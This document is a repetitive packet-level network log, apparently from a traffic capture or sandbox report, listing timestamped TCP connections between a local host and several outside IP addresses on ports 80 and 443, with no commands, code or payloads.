                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.110959053 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.111202955 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.111380100 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.111589909 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.111640930 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.111867905 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.113395929 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.113655090 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.113704920 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.113940001 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.115899086 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116162062 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116213083 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116449118 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116525888 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116770983 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.116833925 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.117180109 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.118001938 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.118237972 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.118288040 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.118521929 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.119406939 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.119587898 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.119637966 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.119911909 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.120973110 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.121268988 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.121319056 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.121563911 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.122565985 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.122802019 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.122853994 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:53.123087883 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.889695883 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.891609907 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.891618967 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.892143965 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.893920898 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.994581938 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.007982016 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.167535067 CEST8049797162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.167718887 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.174999952 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.334788084 CEST8049797162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:57.676301003 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:57.876945972 CEST8049797162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:58.693829060 CEST4979880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:58.854175091 CEST8049798162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:58.854494095 CEST4979880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:58.862000942 CEST4979880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.023612976 CEST8049798162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.499102116 CEST8049797162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.499156952 CEST8049797162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.499454021 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.499454021 CEST4979780192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:00.236774921 CEST8049798162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:00.236826897 CEST8049798162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:00.237051010 CEST4979880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:00.363192081 CEST4979880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.380810022 CEST4979980192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.542165995 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.542702913 CEST4979980192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.551112890 CEST4979980192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.712866068 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.712913036 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.712941885 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.712970972 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.712997913 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:02.607786894 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:02.607839108 CEST8049799162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:02.607980013 CEST4979980192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:03.065759897 CEST4979980192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.083152056 CEST4980080192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.242778063 CEST8049800162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.242966890 CEST4980080192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.247908115 CEST4980080192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.407716990 CEST8049800162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.432800055 CEST8049800162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.432851076 CEST8049800162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.433104992 CEST4980080192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.434900045 CEST4980080192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.594599962 CEST8049800162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.611324072 CEST4980180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.711023092 CEST80498013.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.711339951 CEST4980180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.719887018 CEST4980180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.819565058 CEST80498013.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.821727037 CEST80498013.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.821854115 CEST4980180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:11.235821009 CEST4980180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:11.335560083 CEST80498013.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.253333092 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.352799892 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.353116989 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.360245943 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.460019112 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.462300062 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.462609053 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:13.875842094 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:13.975342989 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.893279076 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.992791891 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.993016958 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000437975 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000549078 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100016117 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100064993 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100291967 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100333929 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100363016 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100430965 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100460052 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.101696014 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.101866007 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:16.515918970 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:16.615731955 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.533313036 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.633208036 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.633399963 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.638305902 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.737876892 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741117954 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741167068 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741445065 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.743313074 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.745955944 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.746280909 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.843075991 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.922868013 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.038496017 CEST8049805162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.038666010 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.046096087 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550146103 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550156116 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550309896 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550436020 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550551891 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550677061 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798933029 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798960924 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799105883 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799137115 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799206972 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799340963 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799361944 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799374104 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799448967 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799560070 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.800009966 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.800134897 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:01.959073067 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:02.976427078 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.071233034 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.071404934 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.081058025 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.175842047 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.421797037 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.422719955 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.422880888 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.423918009 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.518780947 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.592740059 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.692171097 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.692584038 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.699902058 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.799221992 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.801088095 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.801289082 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:10.207245111 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:10.306663036 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.224999905 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.324487925 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.324600935 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.332071066 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.431766033 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.433783054 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.433912992 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:12.847207069 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:12.946480036 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.864762068 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.964914083 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.965086937 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976592064 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976644039 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077193022 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077647924 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077718019 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078409910 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078758955 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078800917 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078828096 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.079124928 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.079309940 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:15.487315893 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:15.587255955 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.506205082 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.606503010 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.606801033 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.613600016 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.713303089 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657341003 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657387018 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657726049 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.659666061 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.664211035 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.664794922 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.759500027 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.818223000 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.917867899 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.918103933 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.926263094 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.025573015 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.031220913 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.031464100 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:26.438100100 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:26.537667990 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.455646992 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.555135965 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.555313110 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.562755108 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.662084103 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.663881063 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.664047956 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:29.078134060 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:29.177970886 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.095854998 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.195727110 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.195889950 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203603983 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203632116 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195380926 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195488930 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195493937 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195703983 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.196351051 CEST8049833172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.196525097 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:14.412009001 CEST4983380192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.429469109 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.524125099 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.524339914 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.531770945 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.626319885 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820482016 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820569992 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820753098 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820760965 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820848942 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820858002 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820916891 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.820981026 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821086884 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821573019 CEST8049834172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:15.821692944 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:17.036499977 CEST4983480192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.053906918 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.148576975 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.148720980 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156327009 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.156388044 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.250966072 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251009941 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251044035 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251072884 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251156092 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251277924 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.251307964 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.429986000 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430042028 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430166006 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430226088 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430263996 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430310965 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430430889 CEST8049835172.67.177.220192.168.11.20
